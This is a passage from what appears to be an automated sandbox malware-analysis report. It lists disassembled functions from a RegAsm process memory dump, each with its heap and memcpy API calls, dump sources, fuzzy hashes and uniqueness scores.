                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    • Opcode ID: 1f88d3d4746139ce9981a157147c545ebc7c2e6c31dcc75d581d8a120878a950
                                                                                                                                                                                                                                                    • Instruction ID: d40df9c149f45c71f88adaa8abf664d616057997e7f1d18d43e3412dd0840ef5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f88d3d4746139ce9981a157147c545ebc7c2e6c31dcc75d581d8a120878a950
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941D4B160420A8FEB24CF78CA8075EB3B2FB45309F284539D556DB741EB35E905CBA2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C726E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C726EAB
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C726EFA
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C726F1E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C726F5C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4259248891-0
                                                                                                                                                                                                                                                    • Opcode ID: 61fcac67a67a0ccaf5f5a91cb7ced763e0d127cc60d4a6d184f7de8f1f190caf
                                                                                                                                                                                                                                                    • Instruction ID: 1917adc7645dd19c029bc2470371cf73c91644e8fe2eda3458ee78000ecaf292
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61fcac67a67a0ccaf5f5a91cb7ced763e0d127cc60d4a6d184f7de8f1f190caf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B831F671A1060A8FDB14CF2CCE806AA73E9FB84304F54813ED41AD7655EF35E659C7A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C6E0A4D), ref: 6C73B5EA
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C6E0A4D), ref: 6C73B623
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C6E0A4D), ref: 6C73B66C
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C6E0A4D), ref: 6C73B67F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1480856625-0
                                                                                                                                                                                                                                                    • Opcode ID: 5320f68411e2784fa74b3df48151d19d6be3da14ee1b2ff4473f6f95af116448
                                                                                                                                                                                                                                                    • Instruction ID: 951239175f981af80253c7eaf50f97d94cff026adfe97a74cd06c4f1db1f69c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5320f68411e2784fa74b3df48151d19d6be3da14ee1b2ff4473f6f95af116448
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE31E371A00626CFDB10CF68CD4465ABBB5EF84315F5A8579C80A9B203DB31F915CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C70F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C70F611
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C70F623
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C70F652
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C70F668
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                                                    • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                    • Instruction ID: cd2b267befd6c3ef1ba13411a1a71366a4a09db51454459495d1b7ee91532998
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA316FB1B00614AFC714CF1DCDC4A9B77F6EB84358B148539FA498BB05D631E9448B98
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6EB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6EB96F
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C6EB99A
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6EB9B0
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6EB9B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3313557100-0
                                                                                                                                                                                                                                                    • Opcode ID: a22fdee16068612c04cb31e2ae0290758d077825cb73279b58bad9f403f74250
                                                                                                                                                                                                                                                    • Instruction ID: cd98027cf27e0bc2d2b4bf941cf59c301cf8e32df183581b71885d39ddab9725
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22fdee16068612c04cb31e2ae0290758d077825cb73279b58bad9f403f74250
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6117CB1A003059FCB04DF69DC848ABB7F9BF88314B14853AE91AD7701E731A919CAA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7226B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d9f0aefac1935b949de0789300ff94a00180e6bded432c8b920602d00850ed5
                                                                                                                                                                                                                                                    • Instruction ID: 83dacde7dd31bad7ca10caa8c0a680ea5586655bb16c784bc3ddf88b0fe03fbb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d9f0aefac1935b949de0789300ff94a00180e6bded432c8b920602d00850ed5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF02DB37012005BE7009E18DC88E4773ADEF4522CB540035EA1AC3F02E736FD19C6A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%